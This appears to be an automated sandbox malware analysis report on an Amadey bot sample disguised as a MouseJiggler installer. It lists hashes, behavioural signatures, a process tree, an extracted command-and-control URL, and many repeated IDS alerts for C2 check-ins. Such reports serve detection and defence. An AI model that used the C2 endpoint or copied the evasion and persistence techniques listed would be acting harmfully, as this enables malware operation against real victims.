Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Ac372JNTO6.exe

Overview

General Information

Sample Name:Ac372JNTO6.exe
Analysis ID:494766
MD5:52eeafe4196446eccbada6dd4c750aa2
SHA1:1e8e1eb56e282b5e85c0e7f5ba25a524965706f1
SHA256:663d4270b4fefb6cf4c941532b4aaa3957f43874a6ad73e9b87ccdeedaddb634
Tags:Amadeyexe
Infos:

Most interesting Screenshot:

Detection

Amadey
Score:54
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Amadey bot
Found malware configuration
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
PE file has a writeable .text section
Contains functionality to inject code into remote processes
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Contains functionality to launch a program with higher privileges

Classification

Process Tree

  • System is w10x64
  • Ac372JNTO6.exe (PID: 5144 cmdline: 'C:\Users\user\Desktop\Ac372JNTO6.exe' MD5: 52EEAFE4196446ECCBADA6DD4C750AA2)
    • libupdate.exe (PID: 4568 cmdline: C:\Program Files (x86)\MouseJiggler\libupdate.exe MD5: B1210A977CE23D855A58376927C014A6)
      • libupdate.tmp (PID: 6876 cmdline: 'C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmp' /SL5='$202B4,5001884,960512,C:\Program Files (x86)\MouseJiggler\libupdate.exe' MD5: 3433CBC457B534449FF86EDED3253643)
        • libupdate.exe (PID: 6948 cmdline: 'C:\Program Files (x86)\MouseJiggler\libupdate.exe' /VERYSILENT MD5: B1210A977CE23D855A58376927C014A6)
          • libupdate.tmp (PID: 6668 cmdline: 'C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp' /SL5='$70264,5001884,960512,C:\Program Files (x86)\MouseJiggler\libupdate.exe' /VERYSILENT MD5: 3433CBC457B534449FF86EDED3253643)
            • sqconfig.exe (PID: 5836 cmdline: 'C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe' MD5: 8B3831A85EAC83E63B4A0DEAA53B8404)
    • cmd.exe (PID: 6632 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\deldll.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 5908 cmdline: ping -n 2 -w 1000 127.0.0.1 MD5: 70C24A306F768936563ABDADB9CA9108)
      • PING.EXE (PID: 1240 cmdline: ping -n 2 -w 1000 127.0.0.1 MD5: 70C24A306F768936563ABDADB9CA9108)
  • sqconfig.exe (PID: 1688 cmdline: 'C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe' MD5: 8B3831A85EAC83E63B4A0DEAA53B8404)
  • cleanup

Malware Configuration

Threatname: Amadey

{"C2 url": "91.241.19.101/g7vcSfkbDs2/index.php", "Version": "2.42", "Install File": "rgbux.exe"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000013.00000002.546644069.0000000003A56000.00000004.00000001.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
      00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
        Process Memory Space: sqconfig.exe PID: 5836JoeSecurity_AmadeyYara detected Amadey botJoe Security

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 19.2.sqconfig.exe.13c0000.0.unpackMalware Configuration Extractor: Amadey {"C2 url": "91.241.19.101/g7vcSfkbDs2/index.php", "Version": "2.42", "Install File": "rgbux.exe"}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Ac372JNTO6.exeVirustotal: Detection: 20%Perma Link
          Source: Ac372JNTO6.exeReversingLabs: Detection: 18%
          Multi AV Scanner detection for domain / URLShow sources
          Source: a.pomf.catVirustotal: Detection: 7%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeReversingLabs: Detection: 30%
          Source: Ac372JNTO6.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: unknownHTTPS traffic detected: 69.39.225.3:443 -> 192.168.2.3:49756 version: TLS 1.2
          Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: sqconfig.exe, sqconfig.exe, 00000018.00000002.401692456.0000000003FEE000.00000004.00000001.sdmp
          Source: Binary string: C:\bamboo\bamboo-agent-home\xml-data\build-dir\APRIORITCSM-EEAI31-TRAY\src\CommonManaged\obj\Release\CommonManaged.pdbt source: is-TILI0.tmp.14.dr
          Source: Binary string: C:\Development\Wpf\pdb\agent\dll\pdb\SimpleDb\pdb\Calendar\emptyDll\Sy.pdbA source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, sqconfig.exe, 00000013.00000000.328551958.000000000186D000.00000002.00020000.sdmp, sqconfig.exe, 00000018.00000000.377941312.000000000186D000.00000002.00020000.sdmp
          Source: Binary string: C:\bamboo\bamboo-agent-home\xml-data\build-dir\APRIORITCSM-EEAI31-TRAY\src\UtilsLib\obj\Release\UtilsLib.pdb source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp
          Source: Binary string: C:\bamboo\bamboo-agent-home\xml-data\build-dir\APRIORITCSM-EEAI31-TRAY\src\CommonManaged\obj\Release\CommonManaged.pdb source: is-TILI0.tmp.14.dr
          Source: Binary string: C:\Development\Wpf\pdb\agent\dll\pdb\SimpleDb\pdb\Calendar\emptyDll\Sy.pdb source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, sqconfig.exe, 00000013.00000000.328551958.000000000186D000.00000002.00020000.sdmp, sqconfig.exe, 00000018.00000000.377941312.000000000186D000.00000002.00020000.sdmp
          Source: Binary string: D:\qt5_workdir\0_181\OfficeSuite\obj\obj\x86\Release_wdexe_75.pdb source: sqconfig.exe, 00000018.00000002.402951280.000000006E5BD000.00000002.00020000.sdmp
          Source: Binary string: C:\Workspace\MouseJiggle\obj\Release\MouseJiggle.pdb\ source: Ac372JNTO6.exe, 00000000.00000002.327898708.0000000003ED4000.00000004.00000001.sdmp
          Source: Binary string: C:\Workspace\MouseJiggle\obj\Release\MouseJiggle.pdb source: Ac372JNTO6.exe, 00000000.00000002.327898708.0000000003ED4000.00000004.00000001.sdmp
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeCode function: 0_2_100059A0 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,0_2_100059A0
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_0040AEF4 FindFirstFileW,FindClose,9_2_0040AEF4
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,9_2_0040A928
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: 11_2_0060C2B0 FindFirstFileW,GetLastError,11_2_0060C2B0
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: 11_2_0040E6A0 FindFirstFileW,FindClose,11_2_0040E6A0
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: 11_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,11_2_0040E0D4
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: 11_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,11_2_006B8DE4
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 12_2_0040AEF4 FindFirstFileW,FindClose,12_2_0040AEF4
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 12_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,12_2_0040A928
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: 14_2_0060C2B0 FindFirstFileW,GetLastError,14_2_0060C2B0
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: 14_2_0040E6A0 FindFirstFileW,FindClose,14_2_0040E6A0
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: 14_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,14_2_0040E0D4
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: 14_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,14_2_006B8DE4

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49762 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49763 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49765 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49766 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49767 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49768 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49770 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49772 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49773 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49775 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49777 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49778 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49780 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49781 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49782 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49784 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49786 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49788 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49791 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49793 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49796 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49799 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49802 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49801 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49807 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49809 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49811 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49813 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49816 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49822 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49827 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49831 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49833 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49836 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49839 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49840 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49843 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49846 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49848 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49852 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49854 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49857 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49860 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49868 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49871 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49873 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49876 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49879 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49880 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49882 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49881 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49883 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49884 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49886 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49887 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49888 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49890 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49891 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49893 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49895 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49896 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49897 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49898 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49900 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49902 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49907 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49909 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49912 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49913 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49915 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49918 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49922 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49924 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49927 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49928 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49931 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49933 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49936 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49939 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49941 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49943 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49945 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49948 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49950 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49953 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49951 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49956 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49959 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49960 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49961 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49962 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49964 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49965 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49967 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49968 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49970 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49972 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49973 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49976 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49977 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49979 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49980 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49982 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49983 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49984 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49986 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49987 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49989 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49990 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49992 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49993 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49994 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49995 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49996 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49998 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49999 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50001 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50003 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50004 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50005 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50007 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50008 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50009 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50011 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50012 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50014 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50015 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50016 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50018 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50019 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50021 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50023 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50024 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50027 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50028 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50030 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50029 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50032 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50033 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50035 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50036 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50038 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50040 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50041 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50042 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50043 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50045 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50046 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50047 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50049 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50050 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50052 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50053 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50055 -> 91.241.19.101:80
